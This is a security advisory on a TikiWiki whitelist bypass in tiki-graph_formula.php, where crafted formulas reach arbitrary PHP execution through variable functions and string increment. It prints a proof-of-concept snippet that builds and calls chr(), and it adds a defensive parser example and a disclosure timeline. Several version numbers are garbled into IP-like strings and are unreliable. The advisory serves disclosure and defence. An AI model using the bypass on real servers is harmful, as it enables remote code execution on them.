The information has been provided by Stefan Esser.
The original article can be found at: http://www.sektioneins.de/advisories/SE-2007-01.txt
* TikiWiki version 126.96.36.199 and prior
* TikiWiki version 188.8.131.52
TikiWiki's tiki-graph_formula.php creates an anonymous function with PHP's create_function() to dynamically evaluate a mathematical function supplied by the user through the 'f' URL parameter.
To protect against arbitrary PHP code execution the TikiWiki developers have combined a blacklist and white-list approach. On the one hand they have blacklisted three characters and on the other hand they only allow certain alphanumerical strings in the user input.
The three blacklisted characters are:
` - Allows execution of shell commands
' - String delimiter
" - String delimiter
The white-list of allowed alphanumerical strings contains only mathematical function names such as: sin, cos, tan, pow, ...
When TikiWiki was audited by ShAnKaR he discovered that the white-list check was incorrectly implemented and it was therefore possible to execute any PHP function. This vulnerability is known as CVE-2007-5423 and was fixed with the TikiWiki 184.108.40.206 update.
Unfortunately the repaired white-list does not protect against arbitrary PHP code execution because PHP supports variable functions and variable variables.
$varname = 'othervar';
$$varname = 4; // set $othervar to 4
$funcname = 'chr';
$funcname(95); // call chr(95)
Because TikiWiki's blacklist does not protect against the '$' character, the injected PHP formulas can use temporary variables like $sin, $cos, $tan, ...
It is therefore obvious that the protection can be bypassed by filling the temporary variables with strings representing names of other functions. Because of TikiWiki's black- and white-list this is a little bit tricky but possible.
First of all it seems hard to get any string at all into one of our temporary variables because all allowed functions only return numbers. There are however two PHP features that help: array to string conversion and handling of unknown constants.
$sin=cosh; // cosh is an unknown constant.
// PHP assumes the string 'cosh' as value
$sin[]=pi(); // Creates an array
$sin=$sin.$sin; // String concatenation of arrays. Array to string
// conversion. Becomes 'ArrayArray'
Using these tricks in combination with the ++ operator, which also allows incrementing alphanumerical strings, it is possible, for example, to call the chr() function like this:
$tan=pi()-pi(); // Get 0 into $tan
$sin=cosh; // Get the string 'cosh' into $sin
$min=$sin[$tan]; // Get 'c' into $min
$tan++; // Get 1 into $tan
$min.=$sin[$tan+$tan+$tan]; // Append 'h' to 'c'
$min.=$sin[$tan]; // Append 'o' to 'ch'
$min++; // Increment 'cho' to 'chp'
$min++; // Increment 'chp' to 'chq'
$min++; // Increment 'chq' to 'chr'
$min($tan); // Call chr(1)
With access to the chr() function it is possible to create all kinds of strings and therefore call any other function, which obviously leads to arbitrary PHP code execution.
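The root cause is that filtered input is still compiled as PHP. As an added example (not part of the original advisory and not TikiWiki's actual fix), the formula can instead be parsed and evaluated by a small recursive-descent evaluator, so that '$', '[', '.', '=' and bare names never reach the PHP compiler. The grammar, the function allowlist and the names tokenize(), expect(), expr(), term(), atom() and evaluate() are assumptions made for this sketch.

```php
<?php
// Added example, not TikiWiki code (PHP 8). The grammar and the function
// allowlist are assumptions for illustration; inputs at the end are constructed.
const ALLOWED_FUNCS = ['sin', 'cos', 'tan', 'pow', 'sqrt', 'abs', 'exp', 'log'];
function tokenize(string $f): array {
    $f = preg_replace('/\s+/', '', $f);
    preg_match_all('/\d+(?:\.\d+)?|[a-z]+|[-+*\/(),]/', $f, $m);
    // Anything the pattern skipped ('$', '[', '.', '=', ';', quotes) is fatal.
    if (implode('', $m[0]) !== $f) throw new InvalidArgumentException('illegal character');
    return $m[0];
}
function expect(array &$t, string $s): void {
    if (array_shift($t) !== $s) throw new InvalidArgumentException("expected $s");
}
function expr(array &$t, float $x): float {   // term (('+' | '-') term)*
    $v = term($t, $x);
    while (in_array($t[0] ?? null, ['+', '-'], true))
        $v = array_shift($t) === '+' ? $v + term($t, $x) : $v - term($t, $x);
    return $v;
}
function term(array &$t, float $x): float {   // atom (('*' | '/') atom)*
    $v = atom($t, $x);
    while (in_array($t[0] ?? null, ['*', '/'], true))
        $v = array_shift($t) === '*' ? $v * atom($t, $x) : $v / atom($t, $x);
    return $v;
}
function atom(array &$t, float $x): float {
    $tok = array_shift($t) ?? throw new InvalidArgumentException('unexpected end');
    if ($tok === '-') return -atom($t, $x);
    if ($tok === '(') { $v = expr($t, $x); expect($t, ')'); return $v; }
    if (is_numeric($tok)) return (float) $tok;
    if ($tok === 'x') return $x;
    // A name is accepted only as a whole token that is allowlisted and called.
    if (!in_array($tok, ALLOWED_FUNCS, true)) throw new InvalidArgumentException("unknown name $tok");
    expect($t, '(');
    for ($args = [expr($t, $x)]; ($t[0] ?? null) === ','; $args[] = expr($t, $x)) array_shift($t);
    expect($t, ')');
    return (float) $tok(...$args);
}
function evaluate(string $f, float $x): float {
    $t = tokenize($f);
    $v = expr($t, $x);
    if ($t) throw new InvalidArgumentException('trailing input');
    return $v;
}
foreach (['sin(x)*2+pow(x,2)', '$sin=cosh', 'cosh', 'sin'] as $f) {
    try { $r = evaluate($f, 1.0); } catch (Throwable $e) { $r = 'rejected: ' . $e->getMessage(); }
    echo "$f => $r\n";
}
```

Only the first input evaluates. The assignment from the advisory fails in the tokenizer, and a bare or uncalled name fails in the parser, so no input is ever interpreted as a PHP constant, variable or variable function.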
14. October 2007 - Notified firstname.lastname@example.org, patch in CVS
25. October 2007 - TikiWiki developers released TikiWiki 220.127.116.11
26. October 2007 - TikiWiki developers released TikiWiki 18.104.22.168
29. October 2007 - Public Disclosure